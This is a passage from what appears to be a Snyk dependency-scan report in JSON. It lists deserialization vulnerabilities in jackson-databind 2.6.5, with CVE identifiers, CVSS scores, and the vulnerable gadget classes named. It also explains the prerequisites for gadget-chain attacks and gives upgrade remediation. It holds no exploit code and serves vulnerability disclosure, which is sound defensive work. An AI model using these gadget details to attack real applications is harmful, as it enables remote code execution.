an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.7 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2097)\n", - "epssDetails": { - "percentile": "0.84205", - "probability": "0.01052", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2018-14720" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-x2w5-5m2g-7h5m" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2018-10-11T17:21:22.141403Z", - "functions_new": [ - { - "version": [ - "[,2.9.7)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2018-07-27T17:20:17Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2018-10-11T17:19:17Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:48:33.930153Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72450", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.3)", - "[2.7.0,2.7.9.5)", - "[2.8.0,2.8.11.3)", - "[2.9.0,2.9.7)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.3", - "2.7.9.5", - "2.8.11.3", - "2.9.7" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.7)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2097", - "title": "GitHub Issue" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/blob/a066415d66a6b1a4688ff0ed25695aa3a86ac130/release-notes/VERSION-2.x", - "title": "GitHub Release Notes" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:47:48.151247Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:21.823657Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:55:39.120318Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:47:48.151247Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:51:21.823657Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attack via the `blaze-ds-opt` gadget due to an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-14719`) is not identical to `CVE-2018-12018`, `CVE-2018-14720`, `CVE-2018-14721`, `CVE-2018-14722`,`CVE-2018-12023` and `CVE-2018-11307`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.7 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2097)\n- [GitHub Release Notes](https://github.com/FasterXML/jackson-databind/blob/a066415d66a6b1a4688ff0ed25695aa3a86ac130/release-notes/VERSION-2.x)\n", - "epssDetails": { - "percentile": "0.85805", - "probability": "0.01269", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2018-14719" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-4gq5-ch57-c2mg" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2018-10-11T17:23:45.326350Z", - "functions_new": [ - { - "version": [ - "[,2.9.7)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2018-07-27T17:22:45Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2018-10-11T17:22:38Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:21.823657Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72451", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.3)", - "[2.7.0,2.7.9.5)", - "[2.8.0,2.8.11.3)", - "[2.9.0,2.9.7)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.3", - "2.7.9.5", - "2.8.11.3", - "2.9.7" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.7)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2097", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", - "cvssV3BaseScore": 10, - "modificationTime": "2024-03-11T09:46:43.143163Z" - }, - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N", - "cvssV3BaseScore": 6.8, - "modificationTime": "2024-03-11T09:51:21.774444Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:57:20.565013Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 10, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:46:43.143163Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 6.8, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:51:21.774444Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A malicious user could perform a SSRF attack via the `axis2-jaxws` gadget due to an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-14721`) is not identical to `CVE-2018-12018`, `CVE-2018-14719`, `CVE-2018-14720`, `CVE-2018-14722`,`CVE-2018-12023` and `CVE-2018-11307`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.7 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2097)\n", - "epssDetails": { - "percentile": "0.85710", - "probability": "0.01257", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2018-14721" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-9mxf-g3x6-wv74" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2018-10-11T17:25:40.161831Z", - "functions_new": [ - { - "version": [ - "[,2.9.7)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2018-07-27T17:24:46Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2018-10-11T17:24:39Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:21.774444Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72882", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Wuguixiong" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.3)", - "[2.7.0,2.7.9.5)", - "[2.8.0,2.8.11.3)", - "[2.9.0,2.9.8)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.3", - "2.7.9.5", - "2.8.11.3", - "2.9.8" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[2.0.0, 2.9.8)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/42912cac4753f3f718ece875e4d486f8264c2f2b", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2186", - "title": "GitHub Issue" - }, - { - "url": "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.8", - "title": "GitHub Release Tag" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:48:06.100058Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "cvssV3BaseScore": 7.3, - "modificationTime": "2024-03-11T09:51:22.043196Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:46.690019Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:48:06.100058Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.3, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:51:22.043196Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attacks due to not blocking the `jboss-common-core ` class from polymorphic deserialization.\r\n\r\n**Note** This vulnerability (`CVE-2018-19362`) is not identical to `CVE-2018-19360` and `CVE-2018-19361`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.8 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/42912cac4753f3f718ece875e4d486f8264c2f2b)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2186)\n- [GitHub Release Tag](https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.8)\n", - "epssDetails": { - "percentile": "0.81590", - "probability": "0.00788", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2018-19362" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-c8hm-7hpq-7jhg" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2019-01-03T14:17:19.256477Z", - "functions_new": [ - { - "version": [ - "[2.0.0, 2.9.8)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2019-01-02T19:18:44Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2019-01-03T17:01:51Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:22.043196Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72883", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Wuguixiong" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.3)", - "[2.7.0,2.7.9.5)", - "[2.8.0,2.8.11.3)", - "[2.9.0,2.9.8)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.3", - "2.7.9.5", - "2.8.11.3", - "2.9.8" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[2.0.0, 2.9.8)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/42912cac4753f3f718ece875e4d486f8264c2f2b", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2186", - "title": "GitHub Issue" - }, - { - "url": "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.8", - "title": "GitHub Release Tag" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:48:04.422288Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "cvssV3BaseScore": 7.3, - "modificationTime": "2024-03-11T09:48:34.457712Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:57:20.593938Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:48:04.422288Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.3, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:48:34.457712Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attacks due to not blocking the `axis2-transport-jms ` class from polymorphic deserialization.\r\n\r\n**Note** This vulnerability (`CVE-2018-19360`) is not identical to `CVE-2018-19362` and `CVE-2018-19361`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.8 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/42912cac4753f3f718ece875e4d486f8264c2f2b)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2186)\n- [GitHub Release Tag](https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.8)\n", - "epssDetails": { - "percentile": "0.81590", - "probability": "0.00788", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2018-19360" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-f9hv-mg5h-xcw9" - ] - 